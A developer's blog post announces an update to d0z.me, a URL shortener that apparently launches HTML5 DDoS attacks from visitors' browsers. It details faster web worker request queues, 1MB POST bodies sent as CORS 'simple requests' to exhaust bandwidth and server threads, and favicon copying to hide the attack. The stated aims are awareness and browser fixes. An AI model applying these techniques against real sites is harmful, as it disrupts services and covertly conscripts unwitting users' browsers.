Well, here were are, about three months since I initially released d0z.me, and I've finally gotten away from school and life for a bit this week and updated it. However, I think it was definitely worth the wait. You can grab the code over at d0z.me's new Google Code repository, and see it in action here.
Beyond making the backend code a little bit less of a disaster than it was originally, I have also made the attack itself significantly more effective. For the impatient among you, I will summarize the changes here:
- More efficient web worker implementation for making the requests.
- Some cosmetic changes that make it less obvious that an attack is occurring.
- Switched to POST requests by default, which allow us to hold server threads longer and exhaust a target's bandwidth.
- Lots of updates to the backend code.
Before I go on though, I'd like to send another big THANK YOU to Lavakumar Kuppan over at andlabs.org for his research, feedback, and suggestions. His research was what originally inspired d0z.me, and he has helped give me a few very useful suggestions on how to improve it. Go follow the andlabs blog. Also, thank you to everyone else who sent in bug reports, suggestions, etc since I released it. You rock.
Web Worker Changes
My original implementation of the HTML5 DDoS attack did its job well, but was not exactly polished. I had some ideas for speed improvements even at the time, but hadn't spent much time optimizing. As it was, it opened four webworkers, and only made one request at a time. This produced good results, but was very processor intensive for Firefox users, and wasted valuable time waiting for a response from the server at times. I also was unable to recreate the results from Lava's original presentation (although this later turned out to be a flaw in my testing procedure).
After I released d0z.me, Lava contacted me and suggested instead that I run one web worker and launch many simultaneous requests. Obviously, running multiple requests at a time is much more efficient. With some slight modifications to the pseudocode he provided (to ensure a full request queue is maintained), I was able to achieve slightly better speeds, using only two web workers instead of four.
Originally, d0z.me also implemented an attack almost identical to that of JSLOIC, meaning that an image constantly reloaded in the background. While it added a few extra requests per second, it was rather insignificant compared to its HTML5 counterpart, could only perform GET requests, and had the serious downside of displaying a progress bar in some browsers. Because of this, it has now been removed. In addition, d0z.me now attempts to pull the embedded site's favicon as it's own, so as to appear more legitimate. With these two changes, the URL becomes the only way to tell the embedded site and d0z.me apart in most browsers.
Using POST Requests for Attack Amplification
Advantages to POST Attack
One limitation of the original d0z.me implementation was that it could do little in regards to consuming bandwidth. In addition, while it was able to overwhelm servers with the sheer number of requests, server threads were not held for a very sizable amount of time. This meant that it required a decent number of users to significantly affect performance (either by consuming all available threads, crashing the database, etc). Bandwidth and thread exhaustion are both commonly used DDoS techniques, so why can't we do the same with HTML5 DDoS? Well, turns out, we can!
While the original version of d0z.me used GET requests, we can also make POST requests via CORS. Of course, we can simply issue the same number of requests/second as we can with GET, meaning that in most situations, even without a payload, the effect will be similar. However, there are a number of advantages that POST gives us that GET does not that should be obvious.
Unlike the previous version, however, attackers don't need to find large files on the host to overwhelm the hosts' bandwidth. Given that the default maximum request size is 2GB on Apache, we can send quite sizable requests safely. Most configurations do, in fact, override this default, but we can still send decently large requests regardless. To ensure that it works on most hosts, d0z.me's attack is set to use a 1MB request body. In practice, this is more than sufficient to generate excessive amounts of traffic.
Beyond the bandwidth advantages, we also tie up the server threads for a much longer amount of time, as the host must receive the request before responding. While this doesn't use a "slow POST" style attack like Slowloris, it has a similar effect: tying up processing threads that must receive the overly large requests, and thereby slowing down response times drastically.
F*ckin' CORS, How Does It Work?
So what hosts does this affect, you might ask? Just CORS enabled hosts, right? Wrong.
The CORS working draft defines a series of steps that a browser should go through when attempting to make a cross origin request. First, it should check its cache to see if it has previously connected to this URL within the cache timeout period, and if it has, whether or not cross origin requests were allowed on that URL. If it was allowed, it can go ahead and make the request; if not, the request process should stop there. If, however, the URL is not in the cache, then the draft states that the browser should make a "pre-flight request", which is essentially an empty request that seeks to get the headers for that particular URL (see OPTIONS request). The exception to this rule, however, is if the request is a "simple request", i.e. a GET, HEAD, or POST request.
I considered adding HTTP referrer / origin obfuscation support, which I previously demonstrated was possible. However, as my goal is not to make d0z.me impossible to detect and block, and I still wanted people to be able to find the site if abuse occurs, I decided against doing so. I think it is sufficient that I have warned multiple times against using that to block attacks. It's a band-aid, not a fix. I also considered adding IE support, but the attack is significantly slower without the benefit of web workers. When IE adds support for web workers, I will attempt to add support for it.
I have left GET requests in as an option, although I believe that it is usually a less effective one. However, it may be better to use such an attack if a host disallows all POST requests, or if a.) CORS is enabled on the URL and b.) responding to that request causes the host to do a significant amount of processing. The GET attack also uses significantly less memory on machines viewing the link, which might be a consideration in some instances.
As I said earlier, it's been three months since I released d0z.me. As far as I can tell, all it has achieved is a GTFO message from Dreamhost and a decent number of complaint emails. I do like to think that it has raised awareness of some of the problems with URL shortnerers and HTML5, but no browsers have attempted to limit the number of XHRs that can be made in a given time period (except *maybe* Safari?), and no changes have been made to the CORS working draft. This needs to be fixed.
While I do find a lot of the issues involved here interesting, my main reason in making this new release is to again encourage browser developers and those working on the CORS draft to fix this problem, and do it quickly. I hope it will also be useful for administrators to gauge their systems' susceptibility to these attacks, as well as to come up with defenses against them.